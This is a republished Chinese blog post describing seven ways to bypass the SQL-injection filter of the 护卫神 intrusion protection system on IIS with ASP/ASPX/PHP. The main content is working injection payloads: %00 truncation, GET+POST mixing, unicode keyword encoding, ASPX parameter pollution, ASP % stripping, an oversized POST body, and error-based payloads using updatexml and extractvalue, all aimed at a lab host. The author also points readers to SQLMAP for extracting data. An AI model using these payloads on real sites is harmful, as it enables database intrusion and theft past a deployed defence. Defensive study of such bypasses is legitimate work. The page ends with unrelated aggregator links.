Bypass 护卫神SQL注入防御(多姿势)
护卫神一直专注服务器安全领域, 其中有一款产品,护卫神·入侵防护系统 ,提供了一些网站安全防护的功能,在IIS加固模块中有一个SQL防注入功能。
这边主要分享一下几种思路,Bypass 护卫神SQL注入防御。
0x01 环境搭建
护卫神官网:http://www.huweishen.com
软件版本:护卫神·入侵防护系统 V3.8.1 最新版本
下载地址:http://down.huweishen.com/hws.zip
测试环境:IIS+ASP/ASPX+MSSQL IIS+PHP+MySQL
0x02 WAF测试
护卫神SQL防注入的规则几年了基本都没有什么变化,先来一张拦截测试图:
姿势一:%00截断
%00截断是上传漏洞中常用的一个非常经典的姿势,在SQL注入中,也可以用来Bypass。
在WAF层,接收参数id后,遇到%00截断,只获取到 id=1,无法获取到后面的有害参数输入;
在ASPX+MSSQL中,支持%00来代替空白字符,构造的SQL语句得以成功执行,获取数据。
http://192.168.204.132/sql.aspx?id=1%00and 1=2 union select 1,2,column_name from information_schema.columns
在PHP+Mysql中,可以用/*%00*/
,同样可以进行Bypass。
/sql.php?id=1/*%00*/union select 1,schema_name,3 from information_schema.schemata
姿势二:GET+POST
当同时提交GET、POST请求时,进入POST逻辑,而忽略了GET请求的有害参数输入,可轻易Bypass。
在IIS+ASP/ASPX+MSSQL IIS+PHP+MySQL 均适用。
http://192.168.204.132/sql.aspx?id=1 and 1=2 union select 1,column_name,3 from information_schema.columns
POST:aaa
姿势三:unicode编码
IIS服务器支持对于unicode的解析,对关键词进行unicode编码绕过。
http://192.168.204.132/sql.aspx?id=1 and 1=2 union s%u0045lect 1,2,column_name from information_schema.columns
姿势四:ASPX+HPP
在ASPX中,有一个比较特殊的HPP特性,当GET/POST/COOKIE同时提交的参数id,服务端接收参数id的顺序GET,POST,COOKIE,中间通过逗号链接 。
UNION、SELECT、两个关键字拆分放在GET/POST的位置,通过ASPX的这个特性连起来,姿势利用有点局限,分享一下Bypass思路。
http://192.168.204.132/sql.aspx?id=1 and 1=2 union/*
POST:id=*/select 1,column_name,3 from information_schema.columns
姿势五:ASP %特性
在IIS+ASP中,当我们输入un%ion,解析的时候会去掉%号,服务端接收的参数是union。
http://192.168.204.132/sql.asp?id=1 and 1=2 un%ion select 1,2,column_name from information_schema.columns
姿势六:缓冲区溢出
在PHP+Mysql中,使用POST 大包溢出的思路可成功Bypass。
http://192.168.204.132/sql.php
POST:id=1 and (select 1)=(Select 0xA*49099) union select 1,schema_name,3 from information_schema.SCHEMATA
编写一个简单的Python脚本,当A的个数填充到49099时,可成功Bypass。
姿势七:黑名单绕过
护士神SQL防注入,采用的是黑名单过滤,关键字并不全,比如只过滤union select,select from却放过了,那么这里就存在很多种绕过的形式。
基本上报错注入、盲注、延迟注入都可以很轻易Bypass,这时候直接利用SQLMAP,指定注入方式来获取数据。
?id=1 or (select 1 from (select count(),concat((concat(0x5e5e21,@@version,0x215e5e)),floor(rand(0)2))x from information_schema.tables group by x)a)
?id=1 and 1=(updatexml(1,concat(0x3a,(select user())),1))
?id=1 and extractvalue(1, concat(0x5c, (select VERSION() from information_schema.tables limit 1)))
0x03 END
总结了几种IIS下SQL注入 Bypass的思路,在实战中也很常见。
本文由Bypass原创发布,原文链接:https://www.cnblogs.com/xiaozi/p/9138160.html 欢迎分享本文,转载请保留出处。
关于我:一个网络安全爱好者,致力于分享原创高质量干货,欢迎关注我的个人微信公众号:Bypass--,浏览更多精彩文章。
低调大师中文资讯倾力打造互联网数据资讯、行业资源、电子商务、移动互联网、网络营销平台。
持续更新报道IT业界、互联网、市场资讯、驱动更新,是最及时权威的产业资讯及硬件资讯报道平台。
转载内容版权归作者及来源网站所有,本站原创内容转载请注明来源。
- 上一篇
AY的Dapper研究学习-基本入门-C#开发-aaronyang技术分享
原文: AY的Dapper研究学习-基本入门-C#开发-aaronyang技术分享 ====================www.ayjs.net 杨洋 wpfui.com ayui ay aaronyang=======请不要转载谢谢了。========= 本文,是AY 看github源码,和网上一些博客,文章 整理,写出来的。目前还没找到系统级别的教程 先建立.net framework4.6的控制台项目,添加nuget引用 新建了Sqlserver的数据库TestDapper SQL CREATE TABLE [dbo].[Users]( [UserID] [int] IDENTITY(1,1) NOT NULL, [UserName] [varchar](50) NULL, [Email] [varchar](100) NULL, [Address] [varchar](100) NULL, CONSTRAINT [PK_Users] PRIMARY KEY CLUSTERED ( [UserID] ASC )WITH (PAD_INDEX = OFF, ST...
- 下一篇
AY的Dapper研究学习-继续深入-C#开发-aaronyang技术分享
原文: AY的Dapper研究学习-继续深入-C#开发-aaronyang技术分享 ====================www.ayjs.net 杨洋 wpfui.com ayui ay aaronyang=======请不要转载谢谢了。========= 不想定义属性,直接索引方式用,Dynamic方式 C# var _1 = con.Query("SELECT * FROM USERS").ToArray(); Console.WriteLine(_1[0].UserName + " EMAIL: " + _1[0].Email); 带参数的存储过程 SQL create proc _ay @address varchar(200) output, @id int as Select @address=[Address] from [Users] WHERE USERID=@id GO 数据库执行上面sql。 然后数据库中执行 SQL DECLARE @address varchar(200) exec _ay @address output,@id=1 pri...
相关文章
文章评论
共有0条评论来说两句吧...
文章二维码
点击排行
-
Docker使用Oracle官方镜像安装(12C,18C,19C)
- Springboot2将连接池hikari替换为druid,体验最强大的数据库连接池
- CentOS8编译安装MySQL8.0.19
- Docker快速安装Oracle11G,搭建oracle11g学习环境
- SpringBoot2配置默认Tomcat设置,开启更多高级功能
- MySQL8.0.19开启GTID主从同步CentOS8
- CentOS7,8上快速安装Gitea,搭建Git服务器
- Jdk安装(Linux,MacOS,Windows),包含三大操作系统的最全安装
- SpringBoot2编写第一个Controller,响应你的http请求并返回结果
推荐阅读
最新文章
- Springboot2将连接池hikari替换为druid,体验最强大的数据库连接池
- CentOS8,CentOS7,CentOS6编译安装Redis5.0.7
- MySQL8.0.19开启GTID主从同步CentOS8
- Docker快速安装Oracle11G,搭建oracle11g学习环境
- SpringBoot2整合Redis,开启缓存,提高访问速度
- Windows10,CentOS7,CentOS8安装Nodejs环境
- CentOS7编译安装Cmake3.16.3,解决mysql等软件编译问题
- SpringBoot2编写第一个Controller,响应你的http请求并返回结果
- SpringBoot2更换Tomcat为Jetty,小型站点的福音
- CentOS7设置SWAP分区,小内存服务器的救世主